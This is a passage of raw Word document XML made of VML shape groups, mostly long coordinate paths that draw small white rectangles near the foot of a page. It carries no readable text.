,15182,5697,15182,5697,15182,5697,15181,5697,15181,5697,15181,5697,15181,5697,15181,5697,15181,5697,15181,5697,15181,5697,15181,5697,15180,5697,15180,5697,15180,5697,15180,5697,15180,5697,15179,5697,15179,5697,15179,5697,15178,5697,15178,5697,15178,5697,15177,5697,15177,5697,15176,5697,15176,5697,15175,5697,15175,5697,15174,5697,15173,5697,15173,5697,15172,5697,15171,5697,15170,5697,15170,5697,15169,5697,15168,5697,15167,5697,15166,5697,15165,5697,15164,5697,15163,5697,15162,5697,15160,5697,15159,5697,15158,5697,15156,5697,15155,5697,15154,5697,15152,5697,15151,5697,15149,5697,15147,5697,15146,5697,15144,5697,15142,5697,15140,5697,15138,5697,15136,5697,15134,5697,15132,5697,15130,5697,15127,5697,15125,5697,15123,5697,15120,5697,15118,5697,15115,5697,15113,5697,15110,5697,15107,5697,15104,5697,15101,5697,15098,5697,15095,5697,15092,5697,15089,5697,15085,5697,15082,5697,15078,5697,15075,5697,15071,5697,15068,5697,15064,5697,15060,5697,15056,5697,15052,5697,15048,5697,15043,5697,15039,5697,15035,5697,15030,5697,15026,5697,15021,5697,15016,5697,15011,5697,15006,5697,15001,5697,14996,5697,14991,5697,14986,5697,14980,5697,14975,5697,14969,5697,14963,5697,14957,5697,14951,5697,14945,5697,14939,5697,14933,5697,14927e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:97.500pt;margin-top:763.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1950,15270" coordsize="130,270">
        <v:shape style="position:absolute;left:1950;top:15270;width:130;height:270" coordorigin="1950,15270" coordsize="130,270" path="m1975,15287l1975,15287,1975,15287,1975,15287,1975,15287,1975,15287,1975,15287,1975,15287,1975,15287,1975,15287,1975,15287,1975,15287,1975,15287,1975,15287,1975,15287,1975,15287,1975,15287,1975,15287,1975,15287,1975,15287,1975,15287,1976,15287,1976,15287,1976,15287,1976,15287,1976,15287,1976,15287,1976,15287,1976,15287,1977,15287,1977,15287,1977,15287,1977,15287,1977,15287,1978,15287,1978,15287,1978,15287,1978,15287,1979,15287,1979,15287,1979,15287,1980,15287,1980,15287,1980,15287,1981,15287,1981,15287,1981,15287,1982,15287,1982,15287,1983,15287,1983,15287,1984,15287,1984,15287,1985,15287,1986,15287,1986,15287,1987,15287,1988,15287,1988,15287,1989,15287,1990,15287,1990,15287,1991,15287,1992,15287,1993,15287,1994,15287,1995,15287,1995,15287,1996,15287,1997,15287,1998,15287,1999,15287,2000,15287,2002,15287,2003,15287,2004,15287,2005,15287,2006,15287,2008,15287,2009,15287,2010,15287,2011,15287,2013,15287,2014,15287,2016,15287,2017,15287,2019,15287,2020,15287,2022,15287,2024,15287,2025,15287,2027,15287,2029,15287,2030,15287,2032,15287,2034,15287,2036,15287,2038,15287,2040,15287,2042,15287,2044,15287,2046,15287,2048,15287,2051,15287,2053,15287,2055,15287,2057,15287,2060,15287,2062,15287,2065,15287,2067,15287,2070,15287,2072,15287,2075,15287,2078,15287,2081,15287,2083,15287,2086,15287,2089,15287,2092,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15288,2095,15288,2095,15288,2095,15288,2095,15288,2095,15289,2095,15289,2095,15289,2095,15289,2095,15290,2095,15290,2095,15290,2095,15291,2095,15291,2095,15292,2095,15292,2095,15293,2095,15293,2095,15294,2095,15294,2095,15295,2095,15296,2095,15296,2095,15297,2095,15298,2095,15299,2095,15300,2095,15300,2095,15301,2095,15302,2095,15303,2095,15305,2095,15306,2095,15307,2095,15308,2095,15309,2095,15311,2095,15312,2095,15313,2095,15315,2095,15316,2095,15318,2095,15319,2095,15321,2095,15323,2095,15325,2095,15326,2095,15328,2095,15330,2095,15332,2095,15334,2095,15336,2095,15339,2095,15341,2095,15343,2095,15346,2095,15348,2095,15351,2095,15353,2095,15356,2095,15359,2095,15361,2095,15364,2095,15367,2095,15370,2095,15373,2095,15376,2095,15380,2095,15383,2095,15386,2095,15390,2095,15393,2095,15397,2095,15401,2095,15405,2095,15408,2095,15412,2095,15417,2095,15421,2095,15425,2095,15429,2095,15434,2095,15438,2095,15443,2095,15447,2095,15452,2095,15457,2095,15462,2095,15467,2095,15472,2095,15477,2095,15483,2095,15488,2095,15494,2095,15499,2095,15505,2095,15511,2095,15517,2095,15523,2095,15529,2095,15535,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2094,15542,2094,15542,2094,15542,2094,15542,2094,15542,2094,15542,2094,15542,2094,15542,2093,15542,2093,15542,2093,15542,2093,15542,2093,15542,2092,15542,2092,15542,2092,15542,2092,15542,2091,15542,2091,15542,2091,15542,2090,15542,2090,15542,2090,15542,2089,15542,2089,15542,2089,15542,2088,15542,2088,15542,2087,15542,2087,15542,2086,15542,2086,15542,2085,15542,2084,15542,2084,15542,2083,15542,2083,15542,2082,15542,2081,15542,2080,15542,2080,15542,2079,15542,2078,15542,2077,15542,2076,15542,2075,15542,2075,15542,2074,15542,2073,15542,2072,15542,2071,15542,2070,15542,2068,15542,2067,15542,2066,15542,2065,15542,2064,15542,2063,15542,2061,15542,2060,15542,2059,15542,2057,15542,2056,15542,2054,15542,2053,15542,2051,15542,2050,15542,2048,15542,2047,15542,2045,15542,2043,15542,2041,15542,2040,15542,2038,15542,2036,15542,2034,15542,2032,15542,2030,15542,2028,15542,2026,15542,2024,15542,2022,15542,2019,15542,2017,15542,2015,15542,2013,15542,2010,15542,2008,15542,2005,15542,2003,15542,2000,15542,1998,15542,1995,15542,1992,15542,1990,15542,1987,15542,1984,15542,1981,15542,1978,15542,1975,15542,1975,15542,1975,15542,1975,15542,1975,15542,1975,15542,1975,15542,1975,15542,1975,15542,1975,15542,1975,15542,1975,15542,1975,15542,1975,15542,1975,15541,1975,15541,1975,15541,1975,15541,1975,15541,1975,15541,1975,15541,1975,15541,1975,15540,1975,15540,1975,15540,1975,15540,1975,15539,1975,15539,1975,15539,1975,15539,1975,15538,1975,15538,1975,15537,1975,15537,1975,15536,1975,15536,1975,15535,1975,15535,1975,15534,1975,15534,1975,15533,1975,15532,1975,15531,1975,15531,1975,15530,1975,15529,1975,15528,1975,15527,1975,15526,1975,15525,1975,15524,1975,15523,1975,15522,1975,15521,1975,15519,1975,15518,1975,15517,1975,15515,1975,15514,1975,15512,1975,15511,1975,15509,1975,15507,1975,15506,1975,15504,1975,15502,1975,15500,1975,15498,1975,15496,1975,15494,1975,15492,1975,15490,1975,15488,1975,15485,1975,15483,1975,15480,1975,15478,1975,15475,1975,15473,1975,15470,1975,15467,1975,15464,1975,15461,1975,15458,1975,15455,1975,15452,1975,15449,1975,15446,1975,15442,1975,15439,1975,15435,1975,15431,1975,15428,1975,15424,1975,15420,1975,15416,1975,15412,1975,15408,1975,15404,1975,15399,1975,15395,1975,15390,1975,15386,1975,15381,1975,15376,1975,15372,1975,15367,1975,15362,1975,15356,1975,15351,1975,15346,1975,15340,1975,15335,1975,15329,1975,15323,1975,15318,1975,15312,1975,15306,1975,15299,1975,15293,1975,15287e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:103.500pt;margin-top:763.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2070,15270" coordsize="130,270">
        <v:shape style="position:absolute;left:2070;top:15270;width:130;height:270" coordorigin="2070,15270" coordsize="130,270" path="m2095,15287l2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2095,15287,2096,15287,2096,15287,2096,15287,2096,15287,2096,15287,2096,15287,2096,15287,2096,15287,2096,15287,2097,15287,2097,15287,2097,15287,2097,15287,2097,15287,2098,15287,2098,15287,2098,15287,2098,15287,2099,15287,2099,15287,2099,15287,2100,15287,2100,15287,2100,15287,2101,15287,2101,15287,2102,15287,2102,15287,2102,15287,2103,15287,2103,15287,2104,15287,2105,15287,2105,15287,2106,15287,2106,15287,2107,15287,2108,15287,2108,15287,2109,15287,2110,15287,2110,15287,2111,15287,2112,15287,2113,15287,2114,15287,2115,15287,2116,15287,2116,15287,2117,15287,2118,15287,2119,15287,2121,15287,2122,15287,2123,15287,2124,15287,2125,15287,2126,15287,2128,15287,2129,15287,2130,15287,2132,15287,2133,15287,2134,15287,2136,15287,2137,15287,2139,15287,2140,15287,2142,15287,2144,15287,2145,15287,2147,15287,2149,15287,2151,15287,2152,15287,2154,15287,2156,15287,2158,15287,2160,15287,2162,15287,2164,15287,2166,15287,2168,15287,2171,15287,2173,15287,2175,15287,2178,15287,2180,15287,2182,15287,2185,15287,2187,15287,2190,15287,2192,15287,2195,15287,2198,15287,2201,15287,2203,15287,2206,15287,2209,15287,2212,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15287,2215,15288,2215,15288,2215,15288,2215,15288,2215,15288,2215,15289,2215,15289,2215,15289,2215,15289,2215,15290,2215,15290,2215,15290,2215,15291,2215,15291,2215,15292,2215,15292,2215,15293,2215,15293,2215,15294,2215,15294,2215,15295,2215,15296,2215,15296,2215,15297,2215,15298,2215,15299,2215,15300,2215,15300,2215,15301,2215,15302,2215,15303,2215,15305,2215,15306,2215,15307,2215,15308,2215,15309,2215,15311,2215,15312,2215,15313,2215,15315,2215,15316,2215,15318,2215,15319,2215,15321,2215,15323,2215,15325,2215,15326,2215,15328,2215,15330,2215,15332,2215,15334,2215,15336,2215,15339,2215,15341,2215,15343,2215,15346,2215,15348,2215,15351,2215,15353,2215,15356,2215,15359,2215,15361,2215,15364,2215,15367,2215,15370,2215,15373,2215,15376,2215,15380,2215,15383,2215,15386,2215,15390,2215,15393,2215,15397,2215,15401,2215,15405,2215,15408,2215,15412,2215,15417,2215,15421,2215,15425,2215,15429,2215,15434,2215,15438,2215,15443,2215,15447,2215,15452,2215,15457,2215,15462,2215,15467,2215,15472,2215,15477,2215,15483,2215,15488,2215,15494,2215,15499,2215,15505,2215,15511,2215,15517,2215,15523,2215,15529,2215,15535,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2215,15542,2214,15542,2214,15542,2214,15542,2214,15542,2214,15542,2214,15542,2214,15542,2214,15542,2213,15542,2213,15542,2213,15542,2213,15542,2213,15542,2212,15542,2212,15542,2212,15542,2212,15542,2211,15542,2211,15542,2211,15542,2210,15542,2210,15542,2209,15542,2209,15542,2209,15542,2208,15542,2208,15542,2207,15542,2207,15542,2206,15542,2206,15542,2205,15542,2205,15542,2204,15542,2203,15542,2203,15542,2202,15542,2201,15542,2200,15542,2200,15542,2199,15542,2198,15542,2197,15542,2196,15542,2196,15542,2195,15542,2194,15542,2193,15542,2192,15542,2191,15542,2190,15542,2189,15542,2187,15542,2186,15542,2185,15542,2184,15542,2183,15542,2181,15542,2180,15542,2179,15542,2177,15542,2176,15542,2174,15542,2173,15542,2171,15542,2170,15542,2168,15542,2167,15542,2165,15542,2163,15542,2161,15542,2160,15542,2158,15542,2156,15542,2154,15542,2152,15542,2150,15542,2148,15542,2146,15542,2144,15542,2142,15542,2140,15542,2137,15542,2135,15542,2133,15542,2130,15542,2128,15542,2125,15542,2123,15542,2120,15542,2118,15542,2115,15542,2112,15542,2110,15542,2107,15542,2104,15542,2101,15542,2098,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15542,2095,15541,2095,15541,2095,15541,2095,15541,2095,15541,2095,15541,2095,15541,2095,15541,2095,15540,2095,15540,2095,15540,2095,15540,2095,15539,2095,15539,2095,15539,2095,15539,2095,15538,2095,15538,2095,15537,2095,15537,2095,15536,2095,15536,2095,15535,2095,15535,2095,15534,2095,15534,2095,15533,2095,15532,2095,15531,2095,15531,2095,15530,2095,15529,2095,15528,2095,15527,2095,15526,2095,15525,2095,15524,2095,15523,2095,15522,2095,15521,2095,15519,2095,15518,2095,15517,2095,15515,2095,15514,2095,15512,2095,15511,2095,15509,2095,15507,2095,15506,2095,15504,2095,15502,2095,15500,2095,15498,2095,15496,2095,15494,2095,15492,2095,15490,2095,15488,2095,15485,2095,15483,2095,15480,2095,15478,2095,15475,2095,15473,2095,15470,2095,15467,2095,15464,2095,15461,2095,15458,2095,15455,2095,15452,2095,15449,2095,15446,2095,15442,2095,15439,2095,15435,2095,15431,2095,15428,2095,15424,2095,15420,2095,15416,2095,15412,2095,15408,2095,15404,2095,15399,2095,15395,2095,15390,2095,15386,2095,15381,2095,15376,2095,15372,2095,15367,2095,15362,2095,15356,2095,15351,2095,15346,2095,15340,2095,15335,2095,15329,2095,15323,2095,15318,2095,15312,2095,15306,2095,15299,2095,15293,2095,15287e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:217.500pt;margin-top:763.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4350,15270" coordsize="130,270">
        <v:shape style="position:absolute;left:4350;top:15270;width:130;height:270" coordorigin="4350,15270" coordsize="130,270" path="m4376,15287l4376,15287,4376,15287,4376,15287,4376,15287,4376,15287,4376,15287,4376,15287,4376,15287,4376,15287,4376,15287,4376,15287,4376,15287,4376,15287,4376,15287,4376,15287,4376,15287,4376,15287,4377,15287,4377,15287,4377,15287,4377,15287,4377,15287,4377,15287,4377,15287,4377,15287,4377,15287,4377,15287,4378,15287,4378,15287,4378,15287,4378,15287,4378,15287,4379,15287,4379,15287,4379,15287,4379,15287,4380,15287,4380,15287,4380,15287,4380,15287,4381,15287,4381,15287,4381,15287,4382,15287,4382,15287,4383,15287,4383,15287,4384,15287,4384,15287,4385,15287,4385,15287,4386,15287,4386,15287,4387,15287,4387,15287,4388,15287,4389,15287,4389,15287,4390,15287,4391,15287,4392,15287,4392,15287,4393,15287,4394,15287,4395,15287,4396,15287,4397,15287,4398,15287,4399,15287,4400,15287,4401,15287,4402,15287,4403,15287,4404,15287,4405,15287,4406,15287,4407,15287,4409,15287,4410,15287,4411,15287,4413,15287,4414,15287,4415,15287,4417,15287,4418,15287,4420,15287,4422,15287,4423,15287,4425,15287,4426,15287,4428,15287,4430,15287,4432,15287,4434,15287,4435,15287,4437,15287,4439,15287,4441,15287,4443,15287,4445,15287,4447,15287,4450,15287,4452,15287,4454,15287,4456,15287,4459,15287,4461,15287,4463,15287,4466,15287,4468,15287,4471,15287,4474,15287,4476,15287,4479,15287,4482,15287,4485,15287,4487,15287,4490,15287,4493,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15287,4496,15288,4496,15288,4496,15288,4496,15288,4496,15288,4496,15289,4496,15289,4496,15289,4496,15289,4496,15290,4496,15290,4496,15290,4496,15291,4496,15291,4496,15292,4496,15292,4496,15293,4496,15293,4496,15294,4496,15294,4496,15295,4496,15296,4496,15296,4496,15297,4496,15298,4496,15299,4496,15300,4496,15300,4496,15301,4496,15302,4496,15303,4496,15305,4496,15306,4496,15307,4496,15308,4496,15309,4496,15311,4496,15312,4496,15313,4496,15315,4496,15316,4496,15318,4496,15319,4496,15321,4496,15323,4496,15325,4496,15326,4496,15328,4496,15330,4496,15332,4496,15334,4496,15336,4496,15339,4496,15341,4496,15343,4496,15346,4496,15348,4496,15351,4496,15353,4496,15356,4496,15359,4496,15361,4496,15364,4496,15367,4496,15370,4496,15373,4496,15376,4496,15380,4496,15383,4496,15386,4496,15390,4496,15393,4496,15397,4496,15401,4496,15405,4496,15408,4496,15412,4496,15417,4496,15421,4496,15425,4496,15429,4496,15434,4496,15438,4496,15443,4496,15447,4496,15452,4496,15457,4496,15462,4496,15467,4496,15472,4496,15477,4496,15483,4496,15488,4496,15494,4496,15499,4496,15505,4496,15511,4496,15517,4496,15523,4496,15529,4496,15535,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4496,15542,4495,15542,4495,15542,4495,15542,4495,15542,4495,15542,4495,15542,4495,15542,4494,15542,4494,15542,4494,15542,4494,15542,4493,15542,4493,15542,4493,15542,4493,15542,4492,15542,4492,15542,4492,15542,4491,15542,4491,15542,4491,15542,4490,15542,4490,15542,4489,15542,4489,15542,4488,15542,4488,15542,4487,15542,4487,15542,4486,15542,4486,15542,4485,15542,4484,15542,4484,15542,4483,15542,4482,15542,4482,15542,4481,15542,4480,15542,4479,15542,4478,15542,4478,15542,4477,15542,4476,15542,4475,15542,4474,15542,4473,15542,4472,15542,4471,15542,4470,15542,4469,15542,4467,15542,4466,15542,4465,15542,4464,15542,4462,15542,4461,15542,4460,15542,4458,15542,4457,15542,4456,15542,4454,15542,4453,15542,4451,15542,4449,15542,4448,15542,4446,15542,4444,15542,4443,15542,4441,15542,4439,15542,4437,15542,4435,15542,4433,15542,4431,15542,4429,15542,4427,15542,4425,15542,4423,15542,4421,15542,4418,15542,4416,15542,4414,15542,4411,15542,4409,15542,4407,15542,4404,15542,4401,15542,4399,15542,4396,15542,4393,15542,4391,15542,4388,15542,4385,15542,4382,15542,4379,15542,4376,15542,4376,15542,4376,15542,4376,15542,4376,15542,4376,15542,4376,15542,4376,15542,4376,15542,4376,15542,4376,15542,4376,15542,4376,15542,4376,15542,4376,15541,4376,15541,4376,15541,4376,15541,4376,15541,4376,15541,4376,15541,4376,15541,4376,15540,4376,15540,4376,15540,4376,15540,4376,15539,4376,15539,4376,15539,4376,15539,4376,15538,4376,15538,4376,15537,4376,15537,4376,15536,4376,15536,4376,15535,4376,15535,4376,15534,4376,15534,4376,15533,4376,15532,4376,15531,4376,15531,4376,15530,4376,15529,4376,15528,4376,15527,4376,15526,4376,15525,4376,15524,4376,15523,4376,15522,4376,15521,4376,15519,4376,15518,4376,15517,4376,15515,4376,15514,4376,15512,4376,15511,4376,15509,4376,15507,4376,15506,4376,15504,4376,15502,4376,15500,4376,15498,4376,15496,4376,15494,4376,15492,4376,15490,4376,15488,4376,15485,4376,15483,4376,15480,4376,15478,4376,15475,4376,15473,4376,15470,4376,15467,4376,15464,4376,15461,4376,15458,4376,15455,4376,15452,4376,15449,4376,15446,4376,15442,4376,15439,4376,15435,4376,15431,4376,15428,4376,15424,4376,15420,4376,15416,4376,15412,4376,15408,4376,15404,4376,15399,4376,15395,4376,15390,4376,15386,4376,15381,4376,15376,4376,15372,4376,15367,4376,15362,4376,15356,4376,15351,4376,15346,4376,15340,4376,15335,4376,15329,4376,15323,4376,15318,4376,15312,4376,15306,4376,15299,4376,15293,4376,15287e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:421.500pt;margin-top:763.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="8430,15270" coordsize="130,270">
        <v:shape style="position:absolute;left:8430;top:15270;width:130;height:270" coordorigin="8430,15270" coordsize="130,270" path="m8458,15287l8458,15287,8458,15287,8458,15287,8458,15287,8458,15287,8458,15287,8458,15287,8458,15287,8458,15287,8458,15287,8458,15287,8458,15287,8458,15287,8458,15287,8458,15287,8459,15287,8459,15287,8459,15287,8459,15287,8459,15287,8459,15287,8459,15287,8459,15287,8459,15287,8459,15287,8459,15287,8460,15287,8460,15287,8460,15287,8460,15287,8460,15287,8460,15287,8461,15287,8461,15287,8461,15287,8461,15287,8462,15287,8462,15287,8462,15287,8462,15287,8463,15287,8463,15287,8464,15287,8464,15287,8464,15287,8465,15287,8465,15287,8466,15287,8466,15287,8467,15287,8467,15287,8468,15287,8468,15287,8469,15287,8469,15287,8470,15287,8471,15287,8471,15287,8472,15287,8473,15287,8474,15287,8474,15287,8475,15287,8476,15287,8477,15287,8478,15287,8479,15287,8480,15287,8481,15287,8482,15287,8483,15287,8484,15287,8485,15287,8486,15287,8487,15287,8488,15287,8490,15287,8491,15287,8492,15287,8493,15287,8495,15287,8496,15287,8498,15287,8499,15287,8500,15287,8502,15287,8504,15287,8505,15287,8507,15287,8508,15287,8510,15287,8512,15287,8514,15287,8516,15287,8517,15287,8519,15287,8521,15287,8523,15287,8525,15287,8527,15287,8530,15287,8532,15287,8534,15287,8536,15287,8538,15287,8541,15287,8543,15287,8546,15287,8548,15287,8551,15287,8553,15287,8556,15287,8558,15287,8561,15287,8564,15287,8567,15287,8569,15287,8572,15287,8575,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15288,8578,15288,8578,15288,8578,15288,8578,15288,8578,15289,8578,15289,8578,15289,8578,15289,8578,15290,8578,15290,8578,15290,8578,15291,8578,15291,8578,15292,8578,15292,8578,15293,8578,15293,8578,15294,8578,15294,8578,15295,8578,15296,8578,15296,8578,15297,8578,15298,8578,15299,8578,15300,8578,15300,8578,15301,8578,15302,8578,15303,8578,15305,8578,15306,8578,15307,8578,15308,8578,15309,8578,15311,8578,15312,8578,15313,8578,15315,8578,15316,8578,15318,8578,15319,8578,15321,8578,15323,8578,15325,8578,15326,8578,15328,8578,15330,8578,15332,8578,15334,8578,15336,8578,15339,8578,15341,8578,15343,8578,15346,8578,15348,8578,15351,8578,15353,8578,15356,8578,15359,8578,15361,8578,15364,8578,15367,8578,15370,8578,15373,8578,15376,8578,15380,8578,15383,8578,15386,8578,15390,8578,15393,8578,15397,8578,15401,8578,15405,8578,15408,8578,15412,8578,15417,8578,15421,8578,15425,8578,15429,8578,15434,8578,15438,8578,15443,8578,15447,8578,15452,8578,15457,8578,15462,8578,15467,8578,15472,8578,15477,8578,15483,8578,15488,8578,15494,8578,15499,8578,15505,8578,15511,8578,15517,8578,15523,8578,15529,8578,15535,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8578,15542,8577,15542,8577,15542,8577,15542,8577,15542,8577,15542,8577,15542,8577,15542,8576,15542,8576,15542,8576,15542,8576,15542,8576,15542,8575,15542,8575,15542,8575,15542,8574,15542,8574,15542,8574,15542,8573,15542,8573,15542,8573,15542,8572,15542,8572,15542,8571,15542,8571,15542,8570,15542,8570,15542,8569,15542,8569,15542,8568,15542,8568,15542,8567,15542,8566,15542,8566,15542,8565,15542,8564,15542,8564,15542,8563,15542,8562,15542,8561,15542,8561,15542,8560,15542,8559,15542,8558,15542,8557,15542,8556,15542,8555,15542,8554,15542,8553,15542,8552,15542,8551,15542,8549,15542,8548,15542,8547,15542,8546,15542,8545,15542,8543,15542,8542,15542,8540,15542,8539,15542,8538,15542,8536,15542,8535,15542,8533,15542,8531,15542,8530,15542,8528,15542,8526,15542,8525,15542,8523,15542,8521,15542,8519,15542,8517,15542,8515,15542,8513,15542,8511,15542,8509,15542,8507,15542,8505,15542,8503,15542,8500,15542,8498,15542,8496,15542,8493,15542,8491,15542,8489,15542,8486,15542,8483,15542,8481,15542,8478,15542,8476,15542,8473,15542,8470,15542,8467,15542,8464,15542,8461,15542,8458,15542,8458,15542,8458,15542,8458,15542,8458,15542,8458,15542,8458,15542,8458,15542,8458,15542,8458,15542,8458,15542,8458,15542,8458,15542,8458,15542,8458,15541,8458,15541,8458,15541,8458,15541,8458,15541,8458,15541,8458,15541,8458,15541,8458,15540,8458,15540,8458,15540,8458,15540,8458,15539,8458,15539,8458,15539,8458,15539,8458,15538,8458,15538,8458,15537,8458,15537,8458,15536,8458,15536,8458,15535,8458,15535,8458,15534,8458,15534,8458,15533,8458,15532,8458,15531,8458,15531,8458,15530,8458,15529,8458,15528,8458,15527,8458,15526,8458,15525,8458,15524,8458,15523,8458,15522,8458,15521,8458,15519,8458,15518,8458,15517,8458,15515,8458,15514,8458,15512,8458,15511,8458,15509,8458,15507,8458,15506,8458,15504,8458,15502,8458,15500,8458,15498,8458,15496,8458,15494,8458,15492,8458,15490,8458,15488,8458,15485,8458,15483,8458,15480,8458,15478,8458,15475,8458,15473,8458,15470,8458,15467,8458,15464,8458,15461,8458,15458,8458,15455,8458,15452,8458,15449,8458,15446,8458,15442,8458,15439,8458,15435,8458,15431,8458,15428,8458,15424,8458,15420,8458,15416,8458,15412,8458,15408,8458,15404,8458,15399,8458,15395,8458,15390,8458,15386,8458,15381,8458,15376,8458,15372,8458,15367,8458,15362,8458,15356,8458,15351,8458,15346,8458,15340,8458,15335,8458,15329,8458,15323,8458,15318,8458,15312,8458,15306,8458,15299,8458,15293,8458,15287e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:427.500pt;margin-top:763.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="8550,15270" coordsize="130,270">
        <v:shape style="position:absolute;left:8550;top:15270;width:130;height:270" coordorigin="8550,15270" coordsize="130,270" path="m8578,15287l8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8578,15287,8579,15287,8579,15287,8579,15287,8579,15287,8579,15287,8579,15287,8579,15287,8579,15287,8579,15287,8579,15287,8579,15287,8579,15287,8580,15287,8580,15287,8580,15287,8580,15287,8580,15287,8580,15287,8581,15287,8581,15287,8581,15287,8581,15287,8582,15287,8582,15287,8582,15287,8583,15287,8583,15287,8583,15287,8584,15287,8584,15287,8584,15287,8585,15287,8585,15287,8586,15287,8586,15287,8587,15287,8587,15287,8588,15287,8588,15287,8589,15287,8590,15287,8590,15287,8591,15287,8592,15287,8592,15287,8593,15287,8594,15287,8594,15287,8595,15287,8596,15287,8597,15287,8598,15287,8599,15287,8600,15287,8601,15287,8602,15287,8603,15287,8604,15287,8605,15287,8606,15287,8607,15287,8608,15287,8610,15287,8611,15287,8612,15287,8613,15287,8615,15287,8616,15287,8618,15287,8619,15287,8621,15287,8622,15287,8624,15287,8625,15287,8627,15287,8629,15287,8630,15287,8632,15287,8634,15287,8636,15287,8637,15287,8639,15287,8641,15287,8643,15287,8645,15287,8647,15287,8650,15287,8652,15287,8654,15287,8656,15287,8658,15287,8661,15287,8663,15287,8666,15287,8668,15287,8671,15287,8673,15287,8676,15287,8678,15287,8681,15287,8684,15287,8687,15287,8690,15287,8692,15287,8695,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15287,8698,15288,8698,15288,8698,15288,8698,15288,8698,15288,8698,15289,8698,15289,8698,15289,8698,15289,8698,15290,8698,15290,8698,15290,8698,15291,8698,15291,8698,15292,8698,15292,8698,15293,8698,15293,8698,15294,8698,15294,8698,15295,8698,15296,8698,15296,8698,15297,8698,15298,8698,15299,8698,15300,8698,15300,8698,15301,8698,15302,8698,15303,8698,15305,8698,15306,8698,15307,8698,15308,8698,15309,8698,15311,8698,15312,8698,15313,8698,15315,8698,15316,8698,15318,8698,15319,8698,15321,8698,15323,8698,15325,8698,15326,8698,15328,8698,15330,8698,15332,8698,15334,8698,15336,8698,15339,8698,15341,8698,15343,8698,15346,8698,15348,8698,15351,8698,15353,8698,15356,8698,15359,8698,15361,8698,15364,8698,15367,8698,15370,8698,15373,8698,15376,8698,15380,8698,15383,8698,15386,8698,15390,8698,15393,8698,15397,8698,15401,8698,15405,8698,15408,8698,15412,8698,15417,8698,15421,8698,15425,8698,15429,8698,15434,8698,15438,8698,15443,8698,15447,8698,15452,8698,15457,8698,15462,8698,15467,8698,15472,8698,15477,8698,15483,8698,15488,8698,15494,8698,15499,8698,15505,8698,15511,8698,15517,8698,15523,8698,15529,8698,15535,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8698,15542,8697,15542,8697,15542,8697,15542,8697,15542,8697,15542,8697,15542,